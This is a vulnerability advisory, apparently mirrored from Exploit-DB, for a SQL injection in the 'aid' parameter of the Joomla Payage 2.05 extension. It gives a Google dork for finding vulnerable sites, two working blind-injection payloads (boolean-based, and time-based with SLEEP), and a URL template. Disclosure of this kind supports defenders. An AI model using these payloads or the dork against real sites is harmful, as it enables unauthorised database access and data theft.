Joomla Payage 2.05 - SQL Injection

vendor:

Payage

by:

Persian Hack Team

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Payage

Affected Version From: 2.05

Affected Version To: 2.05

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2017

Joomla Payage 2.05 – SQL Injection

Joomla Payage 2.05 is vulnerable to SQL Injection. The vulnerability exists in the 'aid' parameter of the 'make_payment' task. An attacker can inject malicious SQL queries in the 'aid' parameter and execute them in the backend database. This can be exploited to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Payage 2.05 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
# My Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_payage
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-06-03
 
# POC :
# SQL Injection : 

Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
---

http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=

# Greetz : T3NZOG4N & FireKernel
# Iranian White Hat Hackers